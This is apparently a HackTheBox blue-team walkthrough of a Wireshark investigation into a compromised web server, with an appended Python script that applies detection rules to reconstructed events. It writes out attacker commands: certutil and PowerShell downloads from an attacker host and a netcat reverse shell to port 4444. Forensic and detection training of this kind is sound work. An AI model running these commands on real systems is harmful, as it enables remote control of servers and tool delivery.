Introduction
One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to take a clone of the disk. Can you take a look at the PCAP and see if anything is up?
In this video walk-through, we covered analyzing a compromised webserver with Wireshark as part of HackTheBox Intro To Blue Team Pathway.
Initial Analysis: Finding the Attacker
The first thing I need to do is open up the PCAP file in Wireshark and get my bearings. The key to this investigation is to look at the HTTP traffic, as this is a web server compromise. By applying a simple http filter in Wireshark, I can quickly identify the key players: the attacker and the web server. I can see the very first GET request, which tells me the attacker’s IP address (ending in .7) and the web server’s IP (ending in .5).
Following the Trail: How the Attacker Got In
Now that I know who’s who, I can dig deeper into the HTTP traffic to see the sequence of events. I’ll use Wireshark’s “Follow TCP Stream” feature to get a clear picture of the conversation between the attacker and the server.
Here’s what I found:
- The attacker first accessed the main page and an image, which is pretty normal behavior.
- Then, things get interesting. The attacker requests and accesses a page called upload.aspx. This is a big red flag.
- Looking at the server’s response to this request, I can see a form for file uploads. The form has a parameter called “operation.”
- The attacker then uploads a file named “cmd” and provides an authentication key of “admin.” This tells me that the attacker likely already had administrative access to the web server. The PCAP probably started after the initial login, as I don’t see the login process itself.
Post-Compromise: What the Attacker Did Next
With the web shell uploaded, the attacker now has a foothold on the server. Here’s what they did next:
- Downloading Tools: The attacker used a command-line tool called certutil to download netcat from their own server. Netcat is a versatile networking tool that can be used for all sorts of things, including creating a reverse shell.
- Establishing a Reverse Shell: Once netcat was on the victim machine, the attacker executed it to create a reverse shell connection back to their own IP address on port 4444. This gives them a direct command-line interface to the compromised server.
- Post-Exploitation Commands: I can see the attacker’s post-compromise activity by filtering the Wireshark traffic for tcp.port == 4444. I can see them running commands like whoami (which shows they are running as the web server user) and ipconfig. They also tried to download another file using PowerShell and certutil, but these attempts failed.
Finding the Flag 🚩
The flag for this challenge is cleverly hidden within one of the failed download attempts. It’s encoded in Base32. I simply copied the Base32 string and used a tool called CyberChef to decode it, revealing the flag.
Technical Commands Used
Here’s a list of the commands and filters I used during this investigation:
- Wireshark filter for HTTP traffic:
http
- Command to download netcat using certutil:
certutil -urlcache -split -f "http://[attacker_ip]/nc" "C:\Users\Public\nc.exe"
- Command to execute netcat for a reverse shell:
C:\Users\Public\nc.exe [attacker_ip] 4444 -e cmd.exe
- Wireshark filter for the reverse shell traffic:
tcp.port == 4444
- Post-compromise commands:
whoami
ipconfig
cd C:\
powershell -ep bypass -c "Invoke-WebRequest -Uri http://[attacker_ip]/[base64_encoded_filename] -OutFile C:\Users\Public\file.txt"
certutil -urlcache -split -f "http://[attacker_ip]/[base64_encoded_filename]" "C:\Users\Public\file.txt"
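To turn the post-compromise sequence above and the Base32-hidden flag into something a detection engineer can check automatically, here is an added example (not part of the walkthrough or the HackTheBox challenge material). It runs hypothetical pattern rules over a constructed list of the HTTP requests and shell commands the walkthrough reconstructs from the PCAP, pulls the reverse-shell endpoint out of the netcat command, and decodes the path of a failed download as Base32 (falling back to Base64, the label used in the command list). 192.0.2.7 and the path MZWGCZZR are constructed stand-ins, not values from the capture.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed sample of the events the walkthrough reconstructs from the PCAP,
# one HTTP request or shell command per line. 192.0.2.7 stands in for the
# attacker's address and "MZWGCZZR" is a constructed Base32 path, not the real flag.
SAMPLE_EVENTS = [
    "GET /index.html",
    "GET /upload.aspx",
    "POST /upload.aspx operation=upload&filename=cmd&key=admin",
    'certutil -urlcache -split -f "http://192.0.2.7/nc" "C:\\Users\\Public\\nc.exe"',
    "C:\\Users\\Public\\nc.exe 192.0.2.7 4444 -e cmd.exe",
    "whoami",
    "ipconfig",
    'powershell -ep bypass -c "Invoke-WebRequest -Uri http://192.0.2.7/MZWGCZZR '
    '-OutFile C:\\Users\\Public\\file.txt"',
]

# Hypothetical detection rules, one per stage of the intrusion described above.
RULES = {
    "webshell_upload": re.compile(r"^POST\s+\S*upload\.aspx", re.I),
    "certutil_download": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\s-f\s", re.I),
    "netcat_reverse_shell": re.compile(r"\bnc(\.exe)?\s+(\S+)\s+(\d{1,5})\s+-e\s+\S+", re.I),
    "powershell_download": re.compile(r"\bpowershell\b.*Invoke-WebRequest\b", re.I),
}


def scan_events(events):
    """Return (rule_name, event) for every event that matches a rule, in event order."""
    return [(name, ev) for ev in events for name, rx in RULES.items() if rx.search(ev)]


def reverse_shell_endpoint(event):
    """Extract (host, port) from a netcat -e command, or None if the event is not one."""
    m = RULES["netcat_reverse_shell"].search(event)
    return (m.group(2), int(m.group(3))) if m else None


def decode_hidden_path(url):
    """Decode the last URL path segment as Base32, then Base64; None if neither parses."""
    segment = urlparse(url).path.rsplit("/", 1)[-1]
    for decoder in (base64.b32decode, base64.b64decode):
        try:
            return decoder(segment).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


if __name__ == "__main__":
    for name, ev in scan_events(SAMPLE_EVENTS):
        print(f"[{name}] {ev}")
    print(reverse_shell_endpoint(SAMPLE_EVENTS[4]), decode_hidden_path("http://192.0.2.7/MZWGCZZR"))
```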